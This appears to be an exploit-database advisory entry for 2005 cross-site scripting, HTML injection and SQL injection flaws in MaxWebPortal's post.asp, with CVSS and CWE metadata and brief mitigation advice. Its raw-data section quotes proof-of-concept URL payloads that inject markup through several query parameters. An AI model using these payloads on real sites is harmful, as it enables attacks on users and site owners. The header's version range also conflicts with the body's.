MaxWebPortal Multiple Remote Vulnerabilities

vendor:

MaxWebPortal

by:

SecurityFocus

7.5

CVSS

HIGH

Cross-site Scripting, SQL Injection and HTML Injection

79, 89, 91

CWE

Product Name: MaxWebPortal

Affected Version From: 1.3.2005

Affected Version To: 1.3.2005

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

MaxWebPortal Multiple Remote Vulnerabilities

MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to Cross-site Scripting, SQL Injection and HTML Injection attacks. Cross-site Scripting can be exploited by sending a maliciously crafted URL to the vulnerable application. HTML Injection can be exploited by sending a maliciously crafted URL containing an HTTP request to the vulnerable application. SQL Injection can be exploited by sending a maliciously crafted URL containing a SQL query to the vulnerable application.

Mitigation:

Input validation should be used to prevent malicious input from entering the system. It is also recommended to use a web application firewall to filter malicious input.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13601/info

MaxWebPortal is affected by multiple remote vulnerabilities. These issues may allow an attacker to carry out cross-site scripting, SQL injection and HTML injection attacks.

MaxWebPortal 1.3.5 and prior versions are reportedly vulnerable to these issues. 

Cross-site Scripting
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&mod="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&M="><plaintext>

/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=%00General+Chat&type="><plaintext>

HTML Injection:
/post.asp?method=Topic&FORUM_ID=1& CAT_ID=1&Forum_Title=http://<plaintext>